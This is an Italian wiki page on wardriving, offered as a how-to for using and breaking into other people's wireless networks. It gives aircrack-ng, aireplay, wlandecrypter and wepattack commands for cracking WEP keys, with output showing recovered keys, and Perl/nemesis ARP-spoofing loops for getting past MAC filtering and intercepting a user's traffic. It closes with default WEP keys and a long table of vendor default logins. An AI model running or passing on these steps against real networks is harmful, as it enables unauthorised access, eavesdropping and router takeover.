
From Alessandro's Wiki
Revision as of 06:43, 11 May 2023 by Porcelinux (talk | contribs) (→‎Default Passwords by Manufacturer)
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Chi è un Wardriver?

  • Wardriver è quell'uomo che se ne va ingiro, portatile alla mano a cercare connessioni wireless e ne traccia una mappa. Non importa l'uso che ne fa, se ci navigherà sarà un wardriver buono se attaccherà, decripterà o ingannerà la rete trovata, sarà + un hacker che un wardriver.
  • Io consiglio di utilizzare un pc con linux e una scheda 802.11x con chip Atheros (madwifi). Solitamente D-Link Xtreme.

Scroccare internet

  • una volta configurata la scheda, come ath0 (o eth1 eth7, wlan0 ecc. dipende dalla scheda e dalla distrib.)

siamo pronti per dare un'occhiata e wardriverare.

  • diciamo alla scheda di agganciarsi a qualsiasi rete, qualsiasi canale.
iwconfig ath0 essid any channel 0
  • scanniamo l'aria...
iwlist ath0 scanning

appariranno tutte le reti disponibili, ora bisogna scegliere la rete

  • Prendiamo come esempio la rete wireless
iwconfig ath0 essid wireless
  • se siamo connessi alla rete, vedremo il BSSID dell'acces point.
iwconfig ath0
ifconfig ath0 up
  • la rete adesso è su , ma manca il livello IP, le opzioni sono 2
    • chiedere un ip all'accespoint
dhclient ath0
  • oppure scegliere delle reti a caso, partenda dalla + probabile:
ifconfig ath0
  • oppure
ifconfig ath0
  • oppure
ifconfig ath0
  • oppure
ifconfig ath0
  • oppure
ifconfig ath0
  • una volta trovata la rete proviamo a fare u nping al router/access point
    • se ci ponga al ping, siamo connessi ed è probabile che riusciremo anche a navigare
    • se non pinga, i motivi possono essere un numero molto alto
  1. Il router ha un firewall che blocca il ping
  2. il router ha impostata la sicurezza a livello MAC, una lista di schede di rete accettabili, e il blocco di tutte le schede non conosciute --> vedi + in basso:
  3. il router ha una WEP/WPA, password di protezione.
  4. mentre facevamo il comando di ping, il router si è misteriosamente spento, oppure si è persa la connessione per qualche fattore ambientale, hanno chiuso una finestra (di quelle vere) o qualcuno si è messo tra noi e l'antenna.
  5. non abbiamo azzeccato l'ip del router (di solito è il .1 di una rete, di solito..)
  6. la scheda non funziona
  7. la spina è attaccata?
  8. ecc..

Trovare reti all'infinito

  • se hai un'antenna con cavo e vuoi provare a muoverla per migliorare la ricezione, il comando watch fa comodo.
iwconfig ath0 essid any
watch 'iwlist ath0 scanning |grep -2 Channel'

Niente Paura della WEP


WLAN_39-1.cap è il file dove ho catturato i pacchetti
aircrack-ng -a1 -eWLAN_39 -b00:60:B3:FD:70:57 -m00:0E:35:07:38:B7 -s WLAN_39-1.cap

aircrack-ng -a 1 -m 00:16:0A:06:8B:B3 -b 00:16:0A:06:2A:9C -e "Sweex LW050" -s dump-w-1-ch-6-02.cap

                                                       Aircrack-ng 1.0

                                       [00:00:17] Tested 13626 keys (got 904240 IVs)
  KB    depth   byte(vote)
   0    0/  1   6E(1259008) F8(943360) 0A(937216) 99(935936) 89(935680) A0(934400) 38(932608) 78(932608) 73(930816)
   1    0/  1   69(1231616) 61(944640) 06(941824) C4(941312) 42(940544) 95(935936) 21(935424) E3(933632) 32(932352)
   2    0/  1   63(1238016) E6(945920) E7(944640) 4E(936192) D9(932608) 27(932352) 3E(932096) 93(931072) EE(931072)
   3    0/  1   6F(1248256) 63(938496) 6A(936704) 4D(936448) 92(934400) 60(932352) 25(931584) 6B(929792) E8(927488)
   4    0/  1   31(1227264) B4(947200) DF(943616) 7C(938752) 7B(934656) 30(931328) D9(929792) E5(929536) 0B(928256)
   5    0/  1   33(1232896) 7C(950528) 50(946688) 36(941824) E2(941568) 3F(938240) 89(937472) C1(933632) 68(933376)
   6    0/  1   35(1192192) 72(946944) FD(944128) CA(939776) 6B(938240) 81(935936) 97(933632) 4B(933376) 6D(932608)
   7    0/  1   38(1197824) EA(941312) C7(938240) 2A(935424) B4(934400) 85(932864) 79(930048) 4F(929536) F1(928512)
   8    0/  1   32(1180672) 43(946432) DF(940544) 2B(935680) 4D(934912) 1C(934144) 7A(933888) FB(933376) 98(931840)
   9    0/  1   33(1200128) A0(950016) 39(939520) C9(939264) B4(937984) 59(934912) 66(933376) 0A(932608) EE(932608)
  10    0/  1   7A(961024) 35(941824) 8F(941312) 06(938752) A7(935424) 23(934656) 08(933632) C3(933632) 24(933376)
  11    3/  1   AF(938496) 82(935936) 9C(934912) B1(934400) 11(932864) 1D(932608) 1B(931840) FC(931840) 40(930304)
  12    0/  1   34(1059824) 15(947576) 63(937100) EF(931872) 7D(930464) CE(929532) EC(928572) 9E(927728) D8(927612)
    KEY FOUND! [ 6E:69:63:6F:31:33:35:38:32:33:35:38:34 ] (ASCII: nico135823584 )
       Decrypted correctly: 100%



Generare traffico

  • con aireplay si fa così:
aireplay ath0 -3 -b 00:11:95:9D:74:1C -h 00:90:96:65:E5:47 -a 00:11:95:9D:74:1C -e ADSL-WIRELESS
  • Nel frattempo catturiamo con airodump:
airodump ath0 WLAN_11-1 6

L'output + o meno sarà:

 BSSID              PWR  Beacons      IP / # Data  CH  MB  ENC  ESSID
 00:11:95:9D:74:1C   10     8595           101469   6  54  WEP  ADSL-WIRELESS
 BSSID              STATION            PWR   Packets  ESSID
 00:11:95:9D:74:1C  00:90:96:65:E5:47   -2     56435  ADSL-WIRELESS

AccessPoints WLAN_XX

  • Ho ricevuto un router dalla mia compagnia telefonica con una wep impostata, ma ho perso il foglietto con la chiave... la troverò usando un programma chiamato wlandecrypter usato assieme a wepattack. Servirà anche airodump.
  • vediamo che canale, che essid e che bssid (AP MAC) ha:
iwlist ath0 scan
  • Catturo i pacchetti: (airodump "interfaccia_wifi" "output_file" "channel")
airodump ath0 WLAN_12 6
  • aspetto fino a che non cominciano ad entrare pacchetti di dati ("Data"), poi quando cominciano a essere almeno una decina o un centinaio, premo Control-C per interrompere.
  • adesso passo il file .cap che ha generato airodump e lo passo a wepcrack(airodump genera 2 file, un .cap con i pacchetti e un .txt con le informazioni sugli host e gli AP) wlandecrypter bssid essid | wepattack -f output_name.cap
wlandecrypter 00:60:B3:XX:70:XX WLAN_12 | wepattack -f WLAN_12.cap 
  • L'output sarà + o meno questo:
wlandecrypter 0.4 - (c) 2006 nilp0inter2k6_at_gmail.com
------------>  http://www.rusoblanco.com  <------------
 [+] BSSID: 00:60:B3:77:77:77
 [+] Modelo: Z-com
 [+] ESSID: WLAN_39
 [+] Seleccionada salida estandar

Extraction of necessary data was successfull!

Founded BSSID:
1)  00 60 B3 FD 70 77 / Key 0
1 network loaded...

Accepting wordlist data...

key no. 10000: Z001349270F39
key no. 20000: Z0013494E1F39
key no. 30000: Z001349752F39

++++++++++ Packet decrypted! ++++++++++  
BSSID: 00 60 B3 44 44 44 / Key 0        WepKey: 5A 30 30 31 33 34 39 37 42 30 32 33 39 (Z0013497B0239) 
Encryption: 128 Bit 

time: 11.580097 sec     words: 31492

Access Points SpeedTouccXXXXX / ThomsonXXXX

The default password is generated by an algorithm so, with a simple "while" you can get the password from the mac address and the ESSID , there is a software to do that or a website.


Filtraggio di MAC

  • Questo sistema di protezione ha senso ma non troppo perché l'indirizzo univoco della scheda wifi può essere falsificato, per esempio si potrebbe copiare quello che usa l'utente della rete e farsi scambiare per amico dall'accespoint. Ecco come si fa:
    • è necessario avere perl
    • è necessario il programma nemesis
    • anche uno sniffer serve, come tcpdump o meglio (+ visuale) ethereal e ethereal-gnome come interfaccia.
    • sarà molto utile la tabella a pié di pagina, sulle password di fabbrica dei router e/o access points.
    • immaginazione.

Trovare un indirizzo mac autorizzato:

  1. connettiamoci alla rete, anche se non riceviamo e non possiamo inviare pacchetti, basta che la scheda sia associata all'acces point (si vede il BSSID da iwconfig che è tipo un xx:xx:xx:xx:xx:xx....)
  2. apriamo il nostro sniffer, e cominciamo ad annotarci tutti gli indirizzi MAC che vediamo. Escludiamo quello della nostra scheda,
tcpdump -i ath0 -n -e -q ether host 00:01:38:4D:83:E9
  • questo comando comincerà a stampare linee tate quanti pacchetti passano per l'interfaccia ath0 e che abbiano il mac address del mittente o ricevente = a "00:01:38:4d:83:e9"
14:49:26.143433 00:01:38:4d:83:e9 > 00:13:8f:a3:0c:07, IPv4, length 60: > tcp 0
14:49:26.296083 00:01:38:4d:83:e9 > 00:13:8f:a3:0c:07, IPv4, length 379: > tcp 313
14:49:26.296126 00:13:8f:a3:0c:07 > 00:01:38:4d:83:e9, IPv4, length 66: > tcp 0
  • vediamo che 00:01:38:4d:83:e9 comunica con 00:13:8f:a3:0c:07, quindi se questo non è il MAC della nostra scheda, possiamo prendelo come documento falso da usare con il router, con nemesis:
    • MAC mia scheda 00:01:29:25:27:0e
    • MAC router 00:01:38:4d:83:e9 -> IP
    • MAC utente autorizzato router: 00:13:8f:a3:0c:07 -> IP
  • ora bisogna creare un triango, ossia far credere al router che l'utente siamo noi e contemporaneamente all'utente che il router siamo noi. Questo è possibile generando un pacchetto che dica: 'sono il router e ho questo MAC(il nostro)' all'utente e 'sono l'utente e ho questo MAC(il nostro)' al router.
  • parliamo con il router:
perl -e 'while(1){print "Deviando..\n"; system(" \
nemesis arp -v -r -d ath0 \
-S -D \
-h 00:01:29:25:27:0e -m 00:0B:6A:76:97:AF \
-H 00:00:61:74:68:30 -M 00:0B:6A:76:97:AF \
"); sleep 10; }'
  • parliamo con l'utente:
perl -e 'while(1){print "Deviando..\n"; system(" \
nemesis arp -v -r -d ath0 \
-S -D \
-h 00:01:29:25:27:0e -m 00:13:8f:a3:0c:07 \
-H 00:01:29:25:27:0e -M 00:01:38:4d:83:e9 \
"); sleep 10; }'
  • Questi comandi loopperanno all'infinito, vanno eseguiti in 2 terminali diversi oppure appiccicarli in una chiamata unica di perl, e il risultato sarà che tutto il traffico tra router e utente passerà per la nostra scheda. Così facendo possiamo preovare ad entrare nel router e aggiungere il nostro mac alla lista di "amici".

Defaults WEP Keys


  • Netgear
Default WEP KEY1: 11 11 11 11 11
Default WEP KEY2: 20 21 22 23 24
Default WEP KEY3: 30 31 32 33 34
Default WEP KEY4: 40 41 42 43 44


  • Zyxel
64-bit WEP with 5 characters
Key1= 2e3f4
Key2= 5y7js
Key3= 24fg7
Key4= 98jui

  • 64-bit WEP with 10 hexadecimal digits
('0-9', 'A-F')
Key1= 0x123456789A
Key2= 0x23456789AB
Key3= 0x3456789ABC
Key4= 0x456789ABCD

  • 128-bit WEP with 13 characters
Key1= 2e3f4w345ytre
Key2= 5y7jse8r4i038
Key3= 24fg70okx3fr7
Key4= 98jui2wss35u4

  • 128-bit WEP with 26 hexadecimal digits
('0-9', 'A-F')
Key1= 0x112233445566778899AABBCDEF
Key2= 0x2233445566778899AABBCCDDEE
Key3= 0x3344556677889900AABBCCDDFF
Key4= 0x44556677889900AABBCCDDEEFF 

Power, dBm and mW

thanks to [1]

Rule 1: The Rule of 3 If you raise the dBm value by “3″ you double the mW value:

0dBm = 1mW 3dBm = 2mW 6dBm = 4mW 9dBm = 8mW 12dBm = 16mW 15dBm = 32mW 18dBm = 64mW 21dBm = 128mW 24dBm = 256mW 27dBm = 512mW 30dBm = 1024mW (5GHz Band B legal limit) 33dBm = 2048mW 36dBm = 4096mW (5GHz Band C legal limit)

This also mean that if you lower the dBm value by “3″ you halve the mW value

Rule 2: The Rule of 10 If you raise the dBm value by “10″ you multiply the mW value by 10:

0dBm = 1mW 10dBm = 10mW 20dBm = 100mW 30dBm = 1000mW (5GHz Band B legal limit) 40dBm = 10000mW (Over the 5GHz Band C legal limit)

Yup you guessed it, if you lower the dBm value by 10 you divide the mW value by 10.

The above calculations aren’t exact, but they are typically accurate enough to get by on.

Default Passwords by Manufacturer

MFabbricante Modello OS Versione Login Password

3Com 	- 	1.25 	root 	letmein
3Com 	Super Stack 2 Switch 	Any 	manager 	manager
3Com 	AccessBuilder® 7000 BRI 	Any 	- 	-
3Com 	CoreBuilder 2500 	- 	- 	-
3Com 	Switch 3000/3300 	- 	manager 	manager
3Com 	Switch 3000/3300 	- 	admin 	admin
3Com 	Switch 3000/3300 	- 	security 	security
3com 	Cable Managment System SQL Database (DOSCIC DHCP) 	Win2000 & MS 	DOCSIS_APP 	3com
3Com 	NAC (Network Access Card) 	- 	adm 	none
3Com 	HiPer ARC Card 	v4.1.x of HA 	adm 	none
3Com 	CoreBuilder 6000 	- 	debug 	tech
3Com 	CoreBuilder 7000 	- 	tech 	tech
3Com 	SuperStack II Switch 2200 	- 	debug 	synnet
3Com 	SuperStack II Switch 2700 	- 	tech 	tech
3Com 	SuperStack / CoreBuilder 	- 	admin 	-
3Com 	SuperStack / CoreBuilder 	- 	read 	-
3Com 	SuperStack / CoreBuilder 	- 	write 	-
3Com 	LinkSwitch and CellPlex 	- 	tech 	tech
3Com 	LinkSwitch and CellPlex 	- 	debug 	synnet
3com 	Superstack II 3300FX 	- 	admin 	-
3com 	Switch 3000/3300 	- 	Admin 	3com
3com 	3comCellPlex7000 	- 	tech 	tech
3Com 	Switch 3000/3300 	- 	monitor 	monitor
3Com 	AirConnect Access Point 	n/a 	- 	comcomcom
3com 	Superstack II Dual Speed 500 	- 	security 	security
3Com 	OfficeConnect 5x1 	at least 5.x 	- 	PASSWORD
3Com 	SuperStack 3 Switch 3300XM 	- 	admin 	-
3com 	Super Stack 2 Switch 	Any 	manager 	manager
3Com 	SuperStack II Switch 1100 	- 	manager 	manager
3Com 	SuperStack II Switch 1100 	- 	security 	security
3com 	super stack 2 switch 	any 	manager 	manager
3Com 	Office Connect Remote 812 	- 	root 	!root
3Com 	Switch 3000/3300 	- 	admin 	admin
3COM 	OCR-812 	- 	- 	-
3com 	- 	- 	- 	-
3com 	NBX100 	2.8 	administrator 	0000
3com 	Home Connect 	- 	User 	Password
3Com 	OfficeConnect 5x1 	at least 5.x 	estheralastruey 	-
3Com 	SuperStack II Switch 3300 	- 	manager 	manager
3Com 	Superstack 	- 	- 	-
ACC 	Routers 	- 	netman 	netman
Acc/Newbridge 	Congo/Amazon/Tigris 	All versions 	netman 	netman
Acc/Newbridge 	Congo/Amazon/Tigris 	All versions 	netman 	netman
adaptec 	- 	- 	- 	-
Adaptec RAID 	Storage Manager Pro 	All 	Administrator 	adaptec
adtran 	tsu 600 ethernet module 	- 	18364 	-
Adtran 	TSU 120 e 	- 	- 	ADTRAN
Adtran 	TSU 120 e 	- 	- 	ADTRAN
Aironet 	All 	- 		
alcatel 	- 	- 	- 	-
Alcatel 	1000 ANT 	Win98 	- 	-
alcatel 	speed touch home 	- 	- 	-
Alcatel/Newbridge/Timestep 	VPN Gateway 15xx/45xx/7xxx 	Any 	root 	permit
Alcatel/Newbridge/Timestep 	VPN Gateway 15xx/ 	Any 	root 	permit
Alcatel/Newbridge/Timestep 	VPN Gateway 15xx/ 	Any 	root 	permit
Allied Tenysin 	R130 	- 	Manager 	friend
Alteon 	ACEswitch 180e (telnet) 	- 	admin 	blank
Alteon Web Systems 	All hardware releases 	Web OS 5.2 	none 	admin
APC 	MasterSwitches 	- 	apc 	apc
APC 	Any 	Firmware Pri 	apcuser 	apc
Apple 	Network Assistant 	3.X 	None 	xyzzy
Apple 	Airport 	1.1 	none 	public
Arrowpoint 	any? 	- 	admin 	system
Ascend 	All TAOS models 	all 	admin 	Ascend
Ascend 	Pipeline Terminal Server 	- 	answer 	-
Ascom 	Timeplex Routers 	Any 	See notes 	-
AT&T 	Starlan SmartHUB 	9.9 	N/A 	manager
Axent 	NetProwler manager 	WinNT 	administrator 	admin
Axis 	NPS 530 	5.02 	root 	pass
AXIS 	StorPoint CD100 	4.28 	root 	pass
AXIS 	200 V1.32 	- 	admin 	-
Axis 	2100 Network Camera 	Linux (ETRAX 	root 	pass
bay 	cv1001003 	- 	- 	-
bay 	- 	- 	- 	-
Bay 	- 	- 	- 	-
Bay / Nortel 	ARN 	13.20 	Manager (caps count !) 	-
Bay Network Routers 	All 	- 	User 	-
Bay Networks 	ASN / ARN Routers 	Any 	Manager 	Manager
Bay Networks 	Baystack 	- 	- 	NetICs
Bay/Nortel Networks 	Accelar 1xxx switches 	Any 	rwa 	rwa
Bay/Nortel Networks 	Remote Annex 2000 	Any 	admin 	IP address
BEA 	Weblogic 	5.1 	system 	weblogic
BEA 	- 	- 	- 	-
bewan 	- 	- 	- 	-
Bintec 	all Routers 	Any 	admin 	bintec
Bintec 	- 	- 	- 	-
Biodata 	BIGfire & BIGfire+ 	all 	- 	biodata
Biodata 	all Babylon-Boxes 	all 	- 	Babylon
Borland 	interbase 	- 	- 	-
Borland 	Interbase 	Any 	politcally 	correct
Borland/Inprise 	Interbase 	any 	SYSDBA 	masterkey
BreezeCom 	AP10, SA10 	BreezeNET PR 	- 	-
BreezeCOM 	Station Adapter and Access Point 	4.x 	- 	Super
BreezeCOM 	- 	3.x 	- 	Master
BreezeCOM 	Station Adapter and Access Point 	2.x 	- 	laflaf
Brocade 	Silkworm 	- 	admin 	password
Buffalo/MELCO 	AirStation WLA-L11 	- 	root (cannot be changed) 	(no password by default)
Cabletron 	any 	any 	-- 	--
Cabletron 	NB Series 	Any 	- 	inuvik49
Cabletron routers and switches 	* 	* 	blank 	blank
Cayman 	3220-H DSL Router 	GatorSurf 5. 	Any 	-
celerity 	- 	- 	- 	-
Chase Research 	Iolan+ 	- 	- 	iolan
Cisco 	Any Router and Switch 	10 thru 12 	cisco 	cisco
Cisco 	ConfigMaker Software 	any? 	n/a 	cmaker
CISCO 	Network Registrar 	3.0 	ADMIN 	changeme
CISCO 	N/A 	N/A 	pixadmin 	pixadmin
Cisco 	routers 	Not sure...j 	- 	san-fran
Cisco 	VPN 3000 Concentrator 	- 	admin 	admin
Cisco 	Net Ranger 2.2.1 	Sol 5.6 	root 	attack
cisco 	1600 	12.05 	- 	-
cisco 	1601 	- 	- 	-
cisco 	- 	- 	- 	-
cisco 	- 	- 	- 	-
Cisco 	MGX 	* 	superuser 	superuser
cisco 	1601 	- 	- 	-
cisco 	- 	- 	- 	-
Cisco 	- 	- 	- 	-
cisco 	- 	- 	- 	-
Cisco 	any 	aany IOS 	no default login 	no default password
CISCO 	arrowpoint 	- 	- 	-
cisco 	- 	- 	- 	-
cisco 	- 	- 	- 	-
cisco 	- 	- 	- 	-
Cisco 	2503 	- 	- 	-
Cisco 	- 	- 	- 	-
cisco 	- 	- 	- 	-
Cisco 	IDS (netranger) 	- 	root 	attack
cisco 	- 	- 	- 	-
cisco 	1600 	- 	- 	-
CMOS BIOS 	- 	- 	- 	ESSEX or IPC
Cobalt 	RaQ * Qube* 	Any 	admin 	admin
Com21 	- 	- 	- 	-
Comersus Shopping Cart 	3.2 	Win 95/98/NT 	admin 	dmr99
Compaq 	Insight Manager 	- 	Administrator 	administrator
Compaq 	Insight Manager 	- 	operator 	operator
Compaq 	Management Agents 	All 	administrator 	none
compaq 	- 	- 	- 	-
copper mountain 	- 	- 	- 	-
Coppercom 	- 	- 	- 	-
Coyote-Point 	Equaliser 4 	Free BSD 	eqadmin - Serial port only 	equalizer
Coyote-Point 	Equaliser 4 	Free BSD 	root - Serial port only 	-
Coyote-Point 	Equaliser 4 	Free BSD 	look - Web Browser only (Read a 	look
Coyote-Point 	Equaliser 4 	Free BSD 	touch - Web Browser only (Write 	touch
Cyclades 	MP/RT 	- 	super 	surt
D-Link 	DI-704 	- 	- 	admin
D-Link 	DI-701 	2.22 (?) 	- 	-
Dell 	PowerVault 50F 	WindRiver (E 	root 	calvin
Dell 	PowerVault 35F 	- 	root 	calvin
Dell 	Powerapp Web 100 Linux 	RedHat 6.2 	root 	powerapp
dell 	- 	- 	- 	-
Digiboard 	Portserver 8 & 16 	any 	root 	dbps
DLink 	DI-206 ISDN router 	1.* 	Admin 	Admin
Dlink 	Dl-106 ISDN router 	- 	- 	1234
DLink 	DL-701 Cable/DSL Gateway/Firewall 	- 	- 	year2000
Dlink 	DFE-538TX 10/100 Adapter 	Windows 98 	- 	-
dlink 	di704 	- 	- 	admin
DLink 	DI 106 	winnt 	administrator 	@*nigU^D.ha,;
Dupont Digital Water Proofer 	Sun Sparc 	any 	root 	par0t
eci 	- 	- 	- 	-
Efficient 	- 	- 	- 	-
Elron 	Firewall 	2.5c 	hostname/ip address 	sysadmin
emai 	hotmail 	- 	- 	-
Ericsson 	ACC 	- 	netman 	netman
Ericsson (formerly ACC) 	Any router 	all 	netman 	netman
Extended Systems 	ExtendNet 4000 / Firewall 	all Versions 	admin 	admin
Extended Systems 	Print Servers 	- 	admin 	extendnet
Extreme 	All Summits 	- 	admin 	-
extreme 	black diamond 	- 	- 	-
Extreme 	All 	All 	Admin 	-
Flowpoint 	144, 2200 DSL Routers 	ALL 	- 	password
FlowPoint 	144, 2200 DSL Routers 	ALL 	- 	admin
Flowpoint 	2200 	- 	- 	Serial Num
Flowpoint 	2200 	- 	- 	Serial Num
fore 	- 	- 	- 	-
Fore Systems 	ASX 1000/1200 	6.x 	ami 	-
Foundry Networks 	ServerIronXL 	Any 	- 	-
fujitsu 	l460 	- 	- 	-
Future Networks 	FN 110C Docsis cablemodem 	Any 	- 	-
gatway 	solo9100 	win95 	- 	-
General Instruments 	SB2100D Cable Modem 	- 	test 	test
gonet 	- 	- 	fast 	abd234
Hewlett Packard 	HP Jetdirect (All Models) 	Any 	none 	none
Hewlett Packard 	MPE-XL 	- 	HELLO 	MANAGER.SYS
Hewlett Packard 	MPE-XL 	- 	HELLO 	MGR.SYS
Hewlett Packard 	MPE-XL 	- 	HELLO 	FIELD.SUPPORT
Hewlett Packard 	MPE-XL 	- 	MGR 	CAROLIAN
Hewlett Packard 	MPE-XL 	- 	MGR 	CCC
Hewlett Packard 	MPE-XL 	- 	OPERATOR 	COGNOS
Hewlett Packard 	MPE-XL 	- 	MANAGER 	HPOFFICE
hp 	4150 	- 	- 	-
hp 	- 	- 	- 	-
IBM 	AS/400 	- 	qsecofr 	qsecofr
IBM 	AS/400 	- 	qsysopr 	qsysopr
IBM 	AS/400 	- 	qpgmr 	qpgmr
IBM 	NetCommerce PRO 	3.2 	ncadmin 	ncadmin
IBM 	LAN Server / OS/2 	2.1, 3.0, 4. 	username 	password
IBM 	2210 	RIP 	def 	trade
IBM 	DB2 	WinNT 	db2admin 	db2admin
IBM 	Lotus Domino Go WebServer (net.commerce edition) 	ANY ? 	webadmin 	webibm
IBM 	RS/6000 	AIX 	root 	ibm
ibm 	as400 	- 	- 	-
IBM 	AS/400 	- 	- 	-
IBM 	ra6000 	AIX Unix 	- 	-
IBM 	AIX 	- 	- 	-
Imperia Software 	Imperia Content Managment System 	Unix/NT 	superuser 	superuser
Intel 	510T 	Any 	- 	admin
Intel 	All Routers 	All Versions 	- 	babbit
Intel 	All Routers 	All Versions 	- 	babbit
Intel 	Intel PRO/Wireless 2011 Wireless LAN Access Point 	Any 	- 	Intel
Intel 	wireless lan access Point 	- 	- 	comcomcom
Ipswitch 	Whats up Gold 6.0 	Windows 9x a 	admin 	admin
janta sales 	254 	compaq 	janta sales 	janta211
janta sales 	254 	compaq 	janta sales 	janta211
Jetform 	Jetform_design 	- 	Jetform 	-
Kawa 	- 	- 	- 	-
LANCAST 	- 	- 	- 	-
Lantronix 	LPS1-T Print Server 	j11-16 	any 	system
Lantronix 	MSS100, MSSVIA, UDS10 	Any 	- 	system
Lantronix 	LSB4 	any 	any 	system
Lantronix 	Printer and terminalservers 	- 	- 	system
LGIC 	Goldstream 	2.5.1 	LR-ISDN 	LR-ISDN
Linkou School 	- 	- 	bill 	bill
Linkou School 	- 	- 	bill 	bill
Linksys 	Cable/DSL router 	Any 	- 	admin
Linksys 	BEFSR7(1) OR (4) 	Standalone R 	blank 	admin
linksys 	- 	- 	- 	-
Linksys 	BEFSR41 	- 	(blank) 	admin
Livingston 	Livingston_portmaster2/3 	- 	!root 	blank
Livingston 	Livingston_officerouter 	- 	!root 	blank
Lucent 	Portmaster 2 	- 	!root 	none
Lucent 	Cajun Family 	- 	root 	root
lucent 	Portmaster 3 	unknown 	!root 	!ishtar
Lucent 	Packetstar (PSAX) 	- 	readwrite 	lucenttech1
Lucent 	AP-1000 	- 	public 	public
lucent 	dsl 	- 	- 	-
lucent 	- 	- 	- 	-
macromedia 	freehand 	9 	- 	-
MacSense 	X-Router Pro 	- 	admin 	admin
mcafee 	- 	- 	- 	-
microcom 	hdms 	unknowen 	system 	hdms
Micron 	- 	bios 	- 	-
Microrouter (Cisco) 	Any 	Any 	- 	letmein
Microrouter (Cisco) 	Any 	Any 	- 	letmein
Microsoft 	Windows NT 	All 	Administrator 	-
Microsoft 	Windows NT 	All 	Guest 	-
Microsoft 	Windows NT 	All 	Mail 	-
Microsoft 	SQL Server 	- 	sa 	-
Microsoft 	Windows NT 	4.0 	pkoolt 	pkooltPS
Microsoft 	NT 	- 	- 	start
MICROSOFT 	NT 	4.0 	free user 	user
Microsoft 	Windows NT 	4.0 	admin 	admin
MICROSOFT 	NT 	4.0 	free user 	user
Microsoft 	- 	- 	- 	-
microsoft 	- 	- 	- 	-
Microsoft 	Ms proxy 2.0 	- 	- 	-
microsoft 	- 	- 	- 	-
mICROSOFT 	- 	- 	- 	-
Microsoft 	Key Managment Server 	Windows NT 4 	- 	password
Microsoft 	- 	- 	- 	-
Motorola 	Motorola-Cablerouter 	- 	cablecom 	router
Motorola 	Motorola-Cablerouter 	- 	cablecom 	router
motorola 	cyber surfer 	- 	- 	-
msdloto 	msdloto 	- 	- 	-
msdloto 	- 	- 	- 	-
Multi-Tech 	RASExpress Server 	5.30a 	guest 	none
Nanoteq 	NetSeq firewall 	* 	admin 	NetSeq
NetApp 	NetCache 	any 	admin 	NetCache
Netgaer 	RH328 	- 	- 	1234
Netgear 	RH348 	- 	- 	1234
Netgear 	ISDN-Router RH348 	- 	- 	1234
Netgear 	RT311 	Any 	Admin 	1234
Netgear 	RT314 	Any 	Admin 	1234
Netgear 	RT338 	- 	- 	1234
Netgear 	RT311/RT314 	- 	admin 	1234
netgear 	- 	- 	- 	-
netlink 	rt314 	- 	- 	-
Netopia 	R7100 	4.6.2 	admin 	admin
Netopia 	455 	v3.1 		
Netscreen 	NS-5, NS10, NS-100 	2.0 	netscreen 	netscreen
NeXT 	- 	NeXTStep 3.3 	me 	-
Nokia - Telecom NZ 	M10 	- 	Telecom 	Telecom
Nortel 	Meridian 1 PBX 	OS Release 2 	0000 	0000
Nortel 	Contivity Extranet Switches 	2.x 	admin 	setup
Nortel 	Norstar Modular ICS 	Any 	**ADMIN (**23646) 	ADMIN (23646)
Nortel 	Norstar Modular ICS 	Any 	**CONFIG (266344) 	CONFIG (266344)
Nortel Networks (Bay) 	Instant Internet 	Any 	- 	-
Northern Telecom(Nortel) 	Meridian 1 	- 	- 	m1link
Novell 	NetWare 	Any 	guest 	-
Novell 	NetWare 	any 	PRINT 	-
Novell 	NetWare 	Any 	LASER 	-
Novell 	NetWare 	Any 	HPLASER 	-
Novell 	NetWare 	Any 	PRINTER 	-
Novell 	NetWare 	Any 	LASERWRITER 	-
Novell 	NetWare 	Any 	POST 	-
Novell 	NetWare 	Any 	MAIL 	-
Novell 	NetWare 	Any 	GATEWAY 	-
Novell 	NetWare 	Any 	GATE 	-
Novell 	NetWare 	Any 	ROUTER 	-
Novell 	NetWare 	Any 	BACKUP 	-
Novell 	NetWare 	Arcserve 	CHEY_ARCHSVR 	WONDERLAND
Novell 	NetWare 	Any 	WINDOWS_PASSTHRU 	-
novell 	- 	- 	- 	-
ODS 	1094 IS Chassis 	4.x 	ods 	ods
Optivision 	Nac 3000 & 4000 	any 	root 	mpegvideo
Oracle 	8i 	8.1.6 	sys 	change_on_install
Oracle 	Internet Directory Service 	any 	cn=orcladmin 	welcome
Oracle 	7 or later 	- 	system 	manager
Oracle 	7 or later 	- 	sys 	change_on_install
Oracle 	7 or later 	Any 	Scott 	Tiger
Oracle 	8i 	all 	internal 	oracle
oracle 	- 	- 	- 	-
oracle 	- 	- 	- 	-
oracle co. 	Database engines 	every 	sys 	change_on_install
Osicom(Datacom) 	Osicom(Datacom) 	- 	sysadm 	sysadm
Pandatel 	EMUX 	all 	admin 	admin
PlainTree 	Waveswitch 100 	- 	- 	default.password
RapidStream 	RS4000-RS8000 	Linux 	rsadmin 	rsadmin
realtek 	8139 	- 	- 	-
Remedy 	Any 	Any 	Demo 	-
Research Machines 	Classroom Assistant 	Windows 95 	manager 	changeme
Rodopi 	Rodopi billing software 'AbacBill' sql database 	- 	rodopi 	rodopi
Samba 	SWAT Package 	Linux 	Any Local User 	Local User password
schoolgirl 	member 	- 	ich 	hci
Securicor3NET 	Monet 	any 	manager 	friend
Securicor3NET 	Cezzanne 	any 	manager 	friend
SGI 	all 	all 	root 	n/a
SGI 	Embedded Support Partner 	IRIX 6.5.6 	Administrator 	Partner
SGI 	IRIX 	ALL 	lp 	lp
SGI 	IRIX 	ALL 	OutOfBox, demos, guest, 4DGifts 	(none by default)
SGI 	IRIX 	ALL 	EZsetup 	-
Shiva 	LanRover 	any? 	root 	-
Shiva 	AccessPort 	Any 	hello 	hello
Shiva 	Any? 	- 	Guest 	blank
SMC 	Barricade 	- 	- 	admin
soho 	nbg800 	unknown 	admin 	1234
Solaris 	- 	- 	- 	-
sonic wall 	any firewall device 	admin 	password 	-
SonicWall 	Any Firewall Device 	- 	admin 	password
SpeedStream 	- 	- 	- 	-
Spider Systems 	M250 / M250L 	- 	- 	hello
Sprint PCS 	SCH2000 	see notes 	Menu - 8 - 0 (see notes) 	040793
Ssangyoung 	SR2501 	- 	- 	2501
Sun 	- 	SunOS 4.1.4 	root 	-
Sun 	- 	Solaris 	- 	-
surecom 	ep3501/3506 	own os 	admin 	surecom
Symnatec 	- 	- 	- 	-
SysKonnect 	6616 	- 	default.password 	-
SysKonnect 	6616 	- 	default.password 	-
Tekelec 	Eagle STP 	- 	eagle 	eagle
Telebit 	netblazer 3.* 	- 	setup/snmp 	setup/nopasswd
Terayon 	TeraLink Getaway 	- 	admin 	password
